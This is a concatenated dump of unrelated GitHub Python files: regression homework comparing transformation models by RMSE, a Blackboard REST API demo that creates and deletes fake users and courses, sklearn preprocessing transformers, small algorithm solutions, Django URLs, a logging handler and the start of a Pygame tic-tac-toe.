(rse3 * rse3)\r\nmse3 = np.mean(rse_sqr3)\r\nrmse3 = np.sqrt(mse3)\r\nrmse3 #### 3.541\r\n\r\n### model building on polynomial transformation\r\n## x = salary+I(salary * salary); y = log(churn)\r\n\r\nmodel4 = smf.ols('np.log(churn)~salary+I(salary * salary)',data = info).fit()\r\nmodel4.summary()\r\n\r\npred4 = model4.predict(pd.DataFrame(info))\r\npred4_at = np.exp(pred4)\r\npred4_at\r\n\r\n### regression line\r\nfrom sklearn.preprocessing import PolynomialFeatures\r\npoly_reg = PolynomialFeatures(degree = 2)\r\nx = info.iloc[:,0:1].values\r\nx_poly = poly_reg.fit_transform(x)\r\n\r\n### regression line\r\nplt.scatter(info.salary, np.log(info.churn))\r\nplt.plot(x, pred4, 'r')\r\nplt.legend('Predicted line', 'Observed data')\r\nplt.show()\r\n\r\n## Error calculation \r\nrse4 = info.churn - pred4_at\r\nrse_sqr4 = (rse4 * rse4)\r\nmse4 = np.mean(rse_sqr4)\r\nrmse4 = np.sqrt(mse4)\r\nrmse4 #### 1.326\r\n\r\n##### choose the best model using rmse\r\nend_info = {\"Model\": ['SLR', 'log','exp','poly'], \"RMSe\": [rmse1, rmse2, rmse3, rmse4]}\r\ntable_rmse = pd.DataFrame(end_info)\r\ntable_rmse\r\n\r\n##### The best model is polynomial model having rmse as 1.326\r\nfrom sklearn.model_selection import train_test_split\r\ntrain,test = train_test_split(info, test_size = 0.2)\r\n\r\nfinalmodel = smf.ols('np.log(info.churn)~salary+I(salary*salary)',data = info).fit()\r\nfinalmodel.summary()\r\n\r\n### prediction on test data\r\ntest_pred = finalmodel.predict(pd.DataFrame(test))\r\ntest_pred_c = np.exp(test_pred)\r\ntest_pred_c\r\n\r\n### model evaluation\r\ntest_rse = test.churn - test_pred_c\r\ntest_rse_sqr = (test_rse * test_rse)\r\ntest_mse = np.mean(test_rse_sqr)\r\ntest_rmse = np.sqrt(test_mse)\r\ntest_rmse #### 1.050\r\n\r\n### prediction on train data\r\ntrain_pred = finalmodel.predict(pd.DataFrame(train))\r\ntrain_pred_c = np.exp(train_pred)\r\ntrain_pred_c\r\n\r\n##### model evaluation \r\ntrain_rse = train.churn - train_pred_c\r\ntrain_rse_sqr = (train_rse * train_rse)\r\ntrain_mse = np.mean(train_rse_sqr)\r\ntrain_rmse = np.sqrt(train_mse)\r\ntrain_rmse ### 1.387\r\n\r\n\r\n# 4.) The Head HR of a certain organization wants to automate their salary hike \r\n#estimation. The organization consulted an analytics service provider and \r\n#asked them to build a basic prediction model by providing them with a sample \r\n#data that contains historic data of the years of experience and the salary \r\n#hike given accordingly over the past years. Approach - A Simple Linear \r\n#regression model needs to be built with target variable ‘Salary’ to predict \r\n#the salary hikeapply necessary transformations and record the RMSE values, \r\n#Correlation coefficient values for different transformation models.\r\n\r\nimport pandas as pd\r\nimport numpy as np\r\ndata = pd.read_csv('~/documents/Salary_Data.csv')\r\ndata\r\ndata.columns\r\n\r\nimport matplotlib.pyplot as plt\r\n\r\n#### finding outliers\r\nplt.boxplot(data.YearsExperience)\r\nplt.boxplot(data.Salary)\r\n\r\n### check distribution of data\r\nimport statsmodels.api as sm\r\nsm.qqplot(data.YearsExperience)\r\nsm.qqplot(data.Salary)\r\n\r\n## histogram\r\nplt.hist(data.YearsExperience)\r\nplt.hist(data.Salary)\r\n\r\n## barchart\r\nplt.bar(height = data.YearsExperience, x = np.arange(1,31,1))\r\nplt.bar(height = data.Salary, x = np.arange(1,31,1))\r\n\r\n### scatter plot\r\nplt.scatter(data.YearsExperience, data.Salary)\r\n\r\n### correlation\r\nnp.corrcoef(data.YearsExperience, data.Salary)\r\n\r\n## covariance\r\nco_var = np.cov(data.YearsExperience, data.Salary)\r\nco_var\r\n\r\nimport statsmodels.formula.api as smf\r\nm1 = smf.ols('Salary~YearsExperience',data = data).fit()\r\nm1.summary()\r\n\r\np1 = m1.predict(pd.DataFrame(data['YearsExperience']))\r\n\r\n#### regression line\r\nplt.scatter(data.YearsExperience, data.Salary)\r\nplt.plot(data['YearsExperience'], p1, 'r')\r\nplt.legend('Predicted line', 'Observed data')\r\nplt.show()\r\n\r\n### Error calculation\r\nrse1 = data.Salary - p1\r\nrse_sqr1 = (rse1 * rse1)\r\nmse1 = np.mean(rse_sqr1)\r\nrmse1 = np.sqrt(mse1)\r\nrmse1 ### 5592.043\r\n\r\n#### build log transformation model\r\n# x =log(YearsExperience); y = Salary\r\nm2 = smf.ols('Salary~np.log(YearsExperience)', data = data).fit()\r\nm2.summary()\r\n\r\np2 = m2.predict(pd.DataFrame(data['YearsExperience']))\r\n\r\n### Regression line\r\nplt.scatter(np.log(data.YearsExperience), data.Salary)\r\nplt.plot(np.log(data.YearsExperience),p2, 'r')\r\nplt.legend('Predicted line', 'Observed data')\r\nplt.show()\r\n\r\n#### Error calculation\r\nrse2 = data.Salary - p2\r\nrse_sqr2 = (rse2 * rse2)\r\nmse2 = np.mean(rse_sqr2)\r\nrmse2 = np.sqrt(mse2)\r\nrmse2\r\n\r\n### build exponential transformation model\r\nm3 = smf.ols('np.log(data.Salary)~YearsExperience', data = data).fit()\r\nm3.summary()\r\n\r\np3 = m3.predict(pd.DataFrame(data['YearsExperience']))\r\n\r\n##### regression line\r\nplt.scatter(data.YearsExperience, np.log(data.Salary))\r\nplt.plot(data.YearsExperience,p3, 'r')\r\nplt.legend('Predicted line', 'Observed data')\r\nplt.show()\r\n\r\n### error calculation\r\nrse3 = data.Salary - p3\r\nrse_sqr3 = (rse3 * rse3)\r\nmse3 = np.mean(rse_sqr3)\r\nrmse3 = np.sqrt(mse3)\r\nrmse3### 80630.25750\r\n\r\n#### building model on polynomial transformantions\r\n## y = np.log(Salary); x = YearsExperience; x^2 = (YearsExperience * YearsExperience)\r\nm4 = smf.ols('np.log(data.Salary)~YearsExperience+I(YearsExperience*YearsExperience)',data = data).fit()\r\n\r\n\r\np4 = m4.predict(pd.DataFrame(data))\r\np4_at = np.exp(p4)\r\np4_at\r\n\r\n### Regression line\r\nfrom sklearn.preprocessing import PolynomialFeatures\r\n\r\npoly_reg = PolynomialFeatures(degree = 2)\r\nx = data.iloc[:,0:1].values\r\nx_poly = poly_reg.fit_transform(x)\r\n\r\nplt.scatter(data.YearsExperience, data.Salary)\r\nplt.plot(x, p4, 'r')\r\nplt.legend('Predicted line', 'Observed data')\r\nplt.show()\r\n\r\n#### Error calculation\r\nrse4 = data.Salary - p4\r\nrse_sqr4 = (rse4 * rse4)\r\nmse4 = np.mean(rse_sqr4)\r\nrmse4 = np.sqrt(mse4)\r\nrmse4\r\n\r\n### choosing best model\r\ndata_final = {\"MODEL\":pd.Series([\"SLR\", \"Log model\", \"Exp model\", \"Poly model\"]), \"RMSE\":pd.Series([rmse1, rmse2, rmse3, rmse4])}\r\ntable_rmse = pd.DataFrame(data_final)\r\ntable_rmse\r\n\r\n##### the best model\r\nfrom sklearn.model_selection import train_test_split\r\ntrain, test = train_test_split(data, test_size = 0.2)\r\n\r\nbest_model = smf.ols('Salary~YearsExperience',data = train).fit()\r\nbest_model.summary()\r\n\r\n### prediction on test data\r\npred_test = best_model.predict(pd.DataFrame(test))\r\npred_test_sal = np.exp(pred_test)\r\npred_test_sal\r\n\r\n### Model evaluation on test data\r\ntest_rse = test.Salary - pred_test_sal\r\ntest_rse_sqr = (test_rse * test_rse)\r\ntest_mse = np.mean(test_rse_sqr)\r\ntest_rmse = np.sqrt(test_mse)\r\ntest_rmse\r\n\r\n#### prediction on train data\r\npred_train = best_model.predict(pd.DataFrame(train))\r\npred_train_sal = np.exp(pred_train)\r\npred_train_sal\r\n\r\n#### model evaluation on train data\r\nt_rse = train.Salary - pred_train_sal\r\nt_rse_sqr = (t_rse * t_rse)\r\nt_mse = np.mean(t_rse_sqr)\r\nt_rmse = np.sqrt(t_mse)\r\nt_rmse\r\n\r\n\r\n#A student from a certain University was asked to prepare a dataset and build\r\n# a prediction model for predicting SAT scores based on the exam giver’s GPA. \r\n#Approach - A regression model needs to be built with target variable \r\n#‘SAT_Scores’and record the RMSE values, Correlation coefficient values for \r\n#different transformation models.\r\n\r\nimport pandas as pd\r\nimport numpy as np\r\nmydata = pd.read_csv('~/documents/SAT_GPA.csv')\r\nmydata\r\nmydata.describe()\r\n\r\nimport matplotlib.pyplot as plt\r\n## boxplot\r\nplt.boxplot(mydata.sat)## no outliers\r\nplt.boxplot(mydata.gpa) ## we have no outliers\r\n\r\n### bar chart\r\nplt.bar(height = mydata.sat, x = np.arange(1,201,1))\r\nplt.bar(height = mydata.gpa, x = np.arange(1,201,1))\r\n\r\n## histogram\r\nplt.hist(mydata.sat)\r\nplt.hist(mydata.gpa)\r\n\r\n### scatter plot\r\nplt.scatter(mydata.sat, mydata.gpa)\r\n\r\n#### lets draw qqplots to check the data normally distributed or not\r\nimport statsmodels.api as sm\r\nsm.qqplot(mydata.sat)\r\nsm.qqplot(mydata.gpa)\r\n\r\n### corrrelation\r\nnp.corrcoef(mydata.sat, mydata.gpa)\r\n\r\n## covariance\r\nco_var = np.cov(mydata.sat, mydata.gpa)\r\nco_var\r\n\r\n### build model using transformations\r\nimport statsmodels.formula.api as smf\r\n\r\nm1 = smf.ols('sat~gpa',data = mydata).fit()\r\nm1.summary()\r\n\r\np1 = m1.predict(pd.DataFrame(mydata['gpa']))\r\n\r\n## Regression line\r\nplt.scatter(mydata.gpa, mydata.sat)\r\nplt.plot(mydata.gpa, p1, 'r')\r\nplt.legend('Predicted line','Observed data')\r\nplt.show()\r\n\r\n#### Error calculation\r\nr = mydata.sat - p1\r\nr_sqr = (r * r)\r\nmse = np.mean(r_sqr)\r\nrmse1 = np.sqrt(mse)\r\nrmse1 ### 166.770\r\n\r\n### using log transformations\r\n# y = sat; x = log(gpa)\r\nm2 = smf.ols('sat~np.log(gpa)', data = mydata).fit()\r\nm2.summary()\r\n\r\np2 = m2.predict(pd.DataFrame(mydata['gpa']))\r\n\r\n### regression line\r\nplt.scatter(np.log(mydata.gpa), mydata.sat)\r\nplt.plot(np.log(mydata.gpa),p2, 'r')\r\nplt.legend('Predicted line', 'Observed data')\r\nplt.show()\r\n\r\n### error calculation\r\nr2 = mydata.sat - p2\r\nr_sqr2 = (r * r)\r\nmse2 = np.mean(r_sqr2)\r\nrmse2 = np.sqrt(mse2)\r\nrmse2 \r\n\r\n### using exponential method\r\n# y = log(sat); x = gpa\r\nm3 = smf.ols('np.log(sat)~gpa',data = mydata).fit()\r\nm3.summary()\r\n\r\np3 = m3.predict(pd.DataFrame(mydata['gpa']))\r\np3_at = np.exp(p3)\r\np3_at\r\n\r\n## Regression line\r\nplt.scatter(mydata.gpa, np.log(mydata.sat))\r\nplt.plot(mydata.gpa, p3, 'r')\r\nplt.legend('Predicted line','Observed data')\r\nplt.show()\r\n\r\n### ERROR CALCULATION\r\nrse3 = mydata.sat - p3\r\nrse_sqr3 = (rse3 * rse3)\r\nmse3 = np.mean(rse_sqr3)\r\nrmse3 = np.sqrt(mse3)\r\nrmse3 ### 516.0534\r\n\r\n### polynomial transformation\r\n# y = log(sat); x = gpa; x^2 = (gpa * gpa)\r\nm4 = smf.ols('np.log(sat)~gpa+I(gpa*gpa)', data = mydata).fit()\r\nm4.summary()\r\n\r\np4 = m4.predict(pd.DataFrame(mydata))\r\np4_at = np.exp(p4)\r\np4_at\r\n\r\n### Regression line\r\nfrom sklearn.preprocessing import PolynomialFeatures\r\npoly_reg = PolynomialFeatures(degree = 2)\r\nx = mydata.iloc[:, 0:1].values\r\nx_ploy = poly_reg.fit_transform(x)\r\n\r\nplt.scatter(mydata.gpa, np.log(mydata.sat))\r\nplt.plot(x, p4, 'r')\r\nplt.legend('Predicted line', 'Observed data')\r\nplt.show()\r\n\r\n### error calculation\r\nrse4 = mydata.sat - p4_at\r\nrse_sqr4 = (rse4 * rse4)\r\nmse4 = np.mean(rse_sqr4)\r\nrmse4 = np.sqrt(mse4)\r\nrmse4\r\n\r\n### choosing best model\r\nfinaldata = {\"Model\":pd.Series(['slr','log','exp','poly']), \"RMSE\":pd.Series([rmse1, rmse2, rmse3, rmse4])}\r\ntable_rmse = pd.DataFrame(finaldata)\r\ntable_rmse\r\n\r\n### the best model\r\nbest_mod = smf.ols('sat~gpa',data = mydata).fit()\r\nbest_mod.summary()\r\n\r\n## prediction on test data\r\n\r\nfrom sklearn.model_selection import train_test_split\r\ntrain, test = train_test_split(mydata, test_size = 0.2)\r\n\r\npred_test = best_mod.predict(pd.DataFrame(test))\r\npred_test_sat = np.exp(pred_test)\r\npred_test_sat\r\n\r\n### Model evaluation on test data\r\ntest_rse = mydata.sat - pred_test_sat\r\ntest_rse_sqr = (test_rse * test_rse)\r\ntest_mse = np.mean(test_rse_sqr)\r\ntest_rmse = np.sqrt(test_mse)\r\ntest_rmse\r\n\r\n### predction on train data\r\npred_train = best_mod.predict(pd.DataFrame(train))\r\npred_train_sat = np.exp(pred_train)\r\npred_train_sat\r\n\r\n### Model evaluation on test data\r\nt_rse = mydata.sat - pred_train_sat\r\nt_rse_sqr = (t_rse * t_rse)\r\nt_mse = np.mean(t_rse_sqr)\r\ntrain_rmse = np.sqrt(t_mse)\r\ntrain_rmse\r\n","repo_name":"Quickcoder1/DataScience","sub_path":"linear regression.py","file_name":"linear regression.py","file_ext":"py","file_size_in_byte":24047,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"20056833057","text":"#%% [markdown]\n# # System Administrators\n# ## Setup : this should seem familiar\n\n#%%\nfrom dotenv import load_dotenv\nfrom os import getenv\nfrom faker import Faker\nfake = Faker()\nimport random\n\nif load_dotenv():\n key, secret, url = getenv('key'), getenv('secret'), getenv('url')\n try:\n assert key, \"Key not loaded\"\n assert secret, \"Secret not loaded\"\n assert url, \"Url not loaded\"\n print(\"All environment variables loaded successfully\")\n except AssertionError as e:\n print(e)\n print(\"Ensure your .env file has url, key and secret\")\nelse:\n print('Make sure you have a .env file')\n\n\n#%%\nfrom bbrest import BbRest\nbb = BbRest(key, secret, url)\n\n#%% [markdown]\n# # Three Use Cases:\n# \n# * 1. Creating fake users, three fake courses, and fake memberships. \n# * 2. Getting a users last accessed courses \n# * 3. Disabling and enabling a course and user. \n#%% [markdown]\n# ## Creating Fake Users, Courses and Memberships\n#%% [markdown]\n# ### Creating Fake Courses\n# We are going to create 3 fake courses. Since we are only creating a handful, we will enter the information manually.\n\n#%%\nr = bb.CreateCourse(payload={'name':'DevCon-Demo1','courseId':'NAC-DevCon1'})\nprint(r.json())\n\n\n#%%\nr1 = bb.CreateCourse(payload={'name':'DevCon-Demo2','courseId':'NAC-DevCon2'})\nr2 = bb.CreateCourse(payload={'name':'DevCon-Demo3','courseId':'NAC-DevCon3'})\n\nprint(r1.status_code)\nprint(r2.status_code)\n\n#%% [markdown]\n# ### Creating Fake Users\n# For this, we are going to create 50 users with the help from the libary 'faker'. Faker generates random names / addresses / passwords ... basically all user info needed for this use case.\n\n#%%\nstudents = []\nfor _ in range(50):\n name = fake.name()\n while len(name.split()) > 2:\n name = fake.name()\n names = name.split() \n first = names[0]\n last = names[-1]\n userName = f'{first[0]}{last}{fake.random_number(digits=3)}'.lower()\n studentId = fake.random_number(digits=9,fix_len=True)\n email = f'{userName}@ku.edu'\n password = fake.password()\n \n student = {'name':{'family': last, 'given': first},\n 'userName': userName,\n 'password': password,\n 'studentId': studentId,\n 'externalId': studentId,\n 'contact': {'email':email}\n }\n \n \n r = bb.CreateUser(payload=student)\n \n if r.status_code == 201:\n print(f'Created account for {name}')\n students.append(student)\n else:\n print(r.text)\n print(f'Account not created for {name}')\n\n#%% [markdown]\n# ### Creating Fake Memberships\n# We are going to add my account as an instructor in these three courses, and the students each into one of the three courses.\n\n#%%\ncourses = ['NAC-DevCon1', 'NAC-DevCon2', 'NAC-DevCon3']\nfor course in courses:\n r = bb.CreateMembership(userId='m500d520', courseId=course, payload={'courseRoleId':'Instructor'})\n print(r.status_code)\n\n\n#%%\nimport random\nrandom.choice(courses)\n\n\n#%%\nrandom.choice(courses)\n\n\n#%%\nfor student in students:\n userName = student['userName']\n course = random.choice(courses)\n r = bb.CreateMembership(userId=userName, courseId=course, payload={})\n if r.status_code == 201:\n print(f'Added {userName} to {course}')\n else:\n print(r.text)\n\n#%% [markdown]\n# ## 2. Getting a User's Last accessed courses\n# This is the start of some useful reporting, and can help focuse the search space for grade or access data.\n\n#%%\nr = bb.GetUserMemberships('m500d520', \n params={'lastAccessed':'2019-07-01',\n 'lastAccessedCompare':'greaterOrEqual'})\nr.json()\n\n\n#%%\ncourses = r.json()['results']\nfor course in courses:\n courseId = course['courseId']\n r = bb.GetCourse(courseId)\n course_info = r.json()\n print(course_info['name'])\n\n#%% [markdown]\n# ## 3. Disabling and enabling a user and a course\n# Sometimes SIS integrations cause issues. We use SAIP, and courses have been disabled when a section changes and enrollments have been disabled when a student changes sections. Here are quick ways to correct this with the API.\n\n#%%\n#Causing course and user to be disabled on purpose\nr1 = bb.UpdateCourse('NAC-DevCon2', payload={'availability':{'available':'Disabled'}})\nr2 = bb.UpdateMembership(userId='m500d520', courseId='NAC-DevCon1', payload={'availability':{'available':'Disabled'}})\n\nprint(r1.json())\nprint(r2.json())\n\n\n#%%\nr1 = bb.UpdateCourse('NAC-DevCon2', payload={'availability':{'available':'Yes'}})\nr2 = bb.UpdateMembership(userId='m500d520', courseId='NAC-DevCon1', payload={'availability':{'available':'Yes'}})\n\nprint(r1.json())\nprint(r2.json())\n\n#%% [markdown]\n# # Clean-up\n# Run this after the other demonstrations. You need the users, courses and memberships for the next two Notebooks. \n\n#%%\nfor user in [student['externalId'] for student in students]:\n r = bb.DeleteUser(f'externalId:{user}')\n print(r.status_code)\n\n\n#%%\nfor course in ['NAC-DevCon1', 'NAC-DevCon2', 'NAC-DevCon3']:\n r = bb.DeleteMembership(courseId=course, userId='m500d520')\n r = bb.DeleteCourse(course)\n print(r.status_code)\n\n\n#%%\n\n\n\n","repo_name":"mdeakyne/BbRestExamples","sub_path":"1SysAdmins.py","file_name":"1SysAdmins.py","file_ext":"py","file_size_in_byte":5157,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"31424294239","text":"from sklearn.base import BaseEstimator, TransformerMixin\nfrom sklearn.preprocessing import OrdinalEncoder\nimport pandas as pd\nimport numpy as np\nfrom sklearn.experimental import enable_iterative_imputer\nfrom sklearn.impute import IterativeImputer\n\n\nclass BigMartNameCleaning(BaseEstimator, TransformerMixin):\n def __init__(self):\n super().__init__()\n\n def fit(self, X, y=None, **kwargs):\n return self\n\n def transform(self, X, y=None, **kwargs):\n # Do Transformation Here\n if X is None:\n raise ValueError('Input the data')\n X = X.copy()\n X = self.predict(X)\n return X\n\n def predict(self, X, y=None, **kwargs):\n if X is None:\n raise ValueError('Input the data')\n X = X.copy()\n\n for value in X['Item_Identifier']:\n if 'FD' in value:\n X['Item_Identifier'] = X['Item_Identifier'].replace(value, 'FD')\n elif 'DR' in value:\n X['Item_Identifier'] = X['Item_Identifier'].replace(value, 'DR')\n elif 'NC' in value:\n X['Item_Identifier'] = X['Item_Identifier'].replace(value, 'NC')\n\n X['Item_Fat_Content'].replace({'reg': 'Regular',\n 'low fat': 'Low Fat',\n 'LF': 'Low Fat'}, inplace=True)\n X['Item_Fat_Content'][X['Item_Identifier'].str.contains('NC')] = 'Non Consumable'\n return X\n\n\nclass BigMartFeatureEncoding(BaseEstimator, TransformerMixin):\n\n def __init__(self):\n super().__init__()\n\n def fit(self, X, y=None, **kwargs):\n if X is None:\n raise ValueError('Input the data')\n\n self.cat_list = list(\n X.select_dtypes(include=['category', 'object', 'bool']).columns)\n\n for col in self.cat_list:\n X[col] = X.astype('object')\n\n self.X_encoding = X.select_dtypes(include=[np.object])\n self.X_rest = X.select_dtypes(exclude=[np.object])\n\n self.oe = OrdinalEncoder()\n self.oe.fit(self.X_encoding)\n\n return self\n\n def transform(self, X, y=None, **kwargs):\n # Do Transformation Here\n if X is None:\n raise ValueError('Input the data')\n X = X.copy()\n X = self.predict(X)\n return X\n\n def predict(self, X, y=None, **kwargs):\n # Include all other columns\n self.cat_list = list(\n X.select_dtypes(include=['category', 'object', 'bool']).columns)\n\n for col in self.cat_list:\n X[col] = X.astype('object')\n\n self.X_encoding = X.select_dtypes(include=[np.object])\n self.X_rest = X.select_dtypes(exclude=[np.object])\n\n self.X_encoded = pd.DataFrame(self.oe.transform(self.X_encoding),\n columns=self.X_encoding.columns)\n\n self.X_encoded.reset_index(drop=True, inplace=True)\n self.X_rest.reset_index(drop=True, inplace=True)\n\n X_out = pd.concat([self.X_encoded, self.X_rest], axis=1)\n X = X_out.reindex(X.columns, axis=1)\n return X\n\n\nclass BigMartFeatureImputation(BaseEstimator, TransformerMixin):\n def __init__(self):\n super().__init__()\n\n def fit(self, X, y=None, **kwargs):\n # Only numerical here\n if X is None:\n raise ValueError('Input the data')\n\n self.X_numerical = X.select_dtypes(include='number')\n self.imputer_num = IterativeImputer()\n self.imputer_num.fit(self.X_numerical)\n\n return self\n\n def predict(self, X, y=None, **kwargs):\n X = X.copy()\n # transform here\n\n self.cat_list = list(\n X.select_dtypes(include=['category', 'object', 'bool']).columns)\n\n for col in self.cat_list:\n X[col] = X.astype('object')\n\n self.X_categorical = X.select_dtypes(include=[np.object])\n self.X_numerical = X.select_dtypes(include=['number'])\n\n self.X_numerical_encoded = pd.DataFrame(self.imputer_num.transform(self.X_numerical),\n columns=self.X_numerical.columns)\n\n self.X_categorical = self.X_categorical.fillna('Missing')\n\n self.X_numerical_encoded.reset_index(drop=True, inplace=True)\n self.X_categorical.reset_index(drop=True, inplace=True)\n\n X_out = pd.concat([self.X_numerical_encoded, self.X_categorical], axis=1)\n X = X_out.reindex(X.columns, axis=1)\n\n return X\n\n def transform(self, X, y=None, **kwargs):\n # Do Transformation Here\n if X is None:\n raise ValueError('Input the data')\n X = X.copy()\n X = self.predict(X)\n return X\n","repo_name":"iameminmammadov/bigmart","sub_path":"packages/datacube_bigmart/datacube_bigmart/preprocessing.py","file_name":"preprocessing.py","file_ext":"py","file_size_in_byte":4647,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"13027865837","text":"def body(start, stop):\n for i in range(start, stop):\n result = i\n char_num = str(i)\n for c in char_num:\n result += int(c)\n # for j in range(len(char_num)):\n # result += int(char_num[j])\n if result == stop:\n return i\n return 0\n\n\ndef answer(n):\n x = 9 * len(str(n))\n if x >= n:\n return body(0, n)\n else:\n return body(n-x, n)\n\n\nn = int(input())\nprint(answer(n))\n","repo_name":"jenych0314/BOJ_PYTHON","sub_path":"Solve/2231_분해합_20210609.py","file_name":"2231_분해합_20210609.py","file_ext":"py","file_size_in_byte":456,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"7995626261","text":"from collections import defaultdict\n\nclass Solution(object):\n def findThePrefixCommonArray(self, A, B):\n da = defaultdict(int)\n db = defaultdict(int)\n n = len(A)\n res = []\n cnt = 0\n for i in xrange(n):\n a, b = A[i], B[i]\n da[a] += 1\n db[b] += 1\n if a == b:\n cnt += 1\n else:\n cnt += 1 if da[a] <= db[a] else 0\n cnt += 1 if da[b] >= db[b] else 0\n res.append(cnt)\n \n return res\n","repo_name":"Wizmann/ACM-ICPC","sub_path":"Leetcode/Algorithm/python/3000/02657-Find the Prefix Common Array of Two Arrays.py","file_name":"02657-Find the Prefix Common Array of Two Arrays.py","file_ext":"py","file_size_in_byte":549,"program_lang":"python","lang":"en","doc_type":"code","stars":63,"dataset":"github-code","pt":"79"} +{"seq_id":"23043717694","text":"import json, os, logging\nfrom datetime import datetime\n\n\nclass HttpHandler(logging.Handler):\n today_date = datetime.now().strftime(\"%Y-%m-%d\")\n\n def emit(self, record):\n try:\n request = record.request\n record.ip = request.META.get('HTTP_X_FORWARDED_FOR')\n record.test = 'test'\n f = open(\n f'{os.fspath(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))}/{self.today_date}_debug.log',\n 'a')\n f.write(f'[ {record.ip} ] ')\n except Exception:\n pass\n\n\ndef create_log_content(request):\n meta_data_of_request = request.META\n request_info_string = ' || USER-IP: ' + meta_data_of_request.get('HTTP_X_FORWARDED_FOR')\n request_info_string += ' || PATH_INFO: ' + meta_data_of_request.get('PATH_INFO')\n request_info_string += ' || QUERY_STRING: ' + meta_data_of_request.get('QUERY_STRING')\n request_info_string += ' || REQUEST_METHOD: ' + meta_data_of_request.get('REQUEST_METHOD')\n request_info_string += ' || HTTP_USER_AGENT: ' + meta_data_of_request.get('HTTP_USER_AGENT').split(' ')[0]\n request_info_string += ' || REQUEST_BODY: ' + json.dumps(dict(request.data))\n\n return request_info_string + '\\n\\n'\n","repo_name":"lee-sanghwa/hoxymetoo","sub_path":"hoxymetoo/create_log.py","file_name":"create_log.py","file_ext":"py","file_size_in_byte":1256,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"34391119445","text":"# @Time : 2023/9/26 10:36\nimport copy\ndef fun(nums: list):\n result = [[], ]\n ls = []\n backtraceing(nums, result, ls, 1)\n return result\n\n\ndef backtraceing(nums: list, result, ls, begin):\n if begin == len(nums)+1:\n return\n for i in range(begin, len(nums)+1):\n ls.append(i)\n result.append(copy.deepcopy(ls))\n backtraceing(nums, result, ls, i + 1)\n ls.pop()\n\n\nif __name__ == '__main__':\n nums = [1, 2, 3,4]\n print(fun(nums))\n","repo_name":"hchgod/leetcode","sub_path":"刷题笔记/leetcode/LC78.py","file_name":"LC78.py","file_ext":"py","file_size_in_byte":480,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"70053711937","text":"\"\"\"Version of str(timedelta) which is not English specific.\"\"\"\n\n\ndef duration_string(duration):\n days = duration.days\n seconds = duration.seconds\n microseconds = duration.microseconds\n\n minutes = seconds // 60\n seconds = seconds % 60\n\n hours = minutes // 60\n minutes = minutes % 60\n\n string = '{:02d}:{:02d}:{:02d}'.format(hours, minutes, seconds)\n if days:\n string = '{} '.format(days) + string\n if microseconds:\n string += '.{:06d}'.format(microseconds)\n\n return string\n","repo_name":"zhl2008/awd-platform","sub_path":"web_hxb2/lib/python3.5/site-packages/django/utils/duration.py","file_name":"duration.py","file_ext":"py","file_size_in_byte":519,"program_lang":"python","lang":"en","doc_type":"code","stars":574,"dataset":"github-code","pt":"79"} +{"seq_id":"34065599857","text":"from django.urls import path\nfrom . import views\nfrom .views import CarsList, CarDetail, UpdateCar, AddCar, DeleteCar\n\nurlpatterns = [\n path('owner/', views.owners, name='owners'),\n path('owner/', views.owner, name='owner'),\n path('add_person/', views.add_person),\n path('cars/', CarsList.as_view()),\n path('cars/', CarDetail.as_view()),\n path('cars//update/', UpdateCar.as_view()),\n path('add_car/', AddCar.as_view()),\n path('cars//delete/', DeleteCar.as_view())\n]","repo_name":"TonikX/ITMO_ICT_WebDevelopment_2020-2021","sub_path":"students/K33402/Ivanova_Inessa/simple_django_web_project/project_first_app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":525,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"13003553693","text":"\"\"\"Utility functions.\"\"\"\n\nimport glob\nimport logging\nimport os\nimport sys\n\nlogger = logging.getLogger(__name__)\n\n\ndef critical(msg: str, force_exit: bool = False) -> None:\n \"\"\"\n Prints a critical error message and exits the application.\n :param msg: Error message\n :param force_exit: Exit the application without calling cleanup handlers\n \"\"\"\n logger.critical(msg)\n if force_exit:\n os._exit(1)\n sys.exit(1)\n\n\ndef check_root() -> None:\n \"\"\"Verifies root privileges.\"\"\"\n if os.geteuid() != 0:\n critical('root privileges required')\n\n\ndef check_acpi_call_module() -> None:\n \"\"\"Verifies the presence of the `acpi_call` kernel module.\"\"\"\n if not os.path.exists('/proc/acpi/call'):\n critical('kernel module acpi_call is not loaded')\n\n\ndef is_on_ac() -> bool:\n \"\"\"\n Checks if the system is using AC as the power source.\n :return: True if on AC\n \"\"\"\n paths = glob.glob('/sys/class/power_supply/AC*/online')\n for path in paths:\n with open(path, encoding='utf_8') as f:\n return int(f.read()) == 1\n # Otherwise assume AC\n return True\n","repo_name":"xsmile/ryzen-ppd","sub_path":"ryzen_ppd/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1121,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"79"} +{"seq_id":"72020090176","text":"import pygame as p\nfrom GameLogic import *\nfrom human import playVShuman\nfrom dumbPC import playVSdpc\nfrom smartPC import playVSspc\nfrom drawANDtype import drawXO\n \n# Window size is 600x600 so we divide coordinates by 200 to get the positions on the board array\ndef getSpot(ttt): \n ttt.spot[0] = ttt.mouse[1] // 200\n ttt.spot[1] = ttt.mouse[0] // 200\n \n# Graphics logic\ndef playGraphics(ttt, scr):\n if ttt.graphics == True:\n p.init()\n bg = (0, 0, 0) # background\n lines = (0, 255, 255)\n \n clock = p.time.Clock()\n \n while ttt.playing:\n clock.tick(120)\n # I am using a buffer instead of screen because it is easier to keep all the drawings on the screen while playing\n # How it works is whatever we draw on the buffer will be applied each frame onto the screen\n # This way we don't have to draw one by one thing but we can draw everything at once onto buffer and then apply it onto the screen\n scr.buffer.fill(bg) \n scr.screen.blit(scr.buffer, (0, 0))\n \n p.draw.line(scr.buffer, lines, (200,0), (200, 600), 3)\n p.draw.line(scr.buffer, lines, (405,0), (405, 600), 3)\n p.draw.line(scr.buffer, lines, (0,200), (600, 200), 3)\n p.draw.line(scr.buffer, lines, (0,405), (600, 405), 3)\n \n 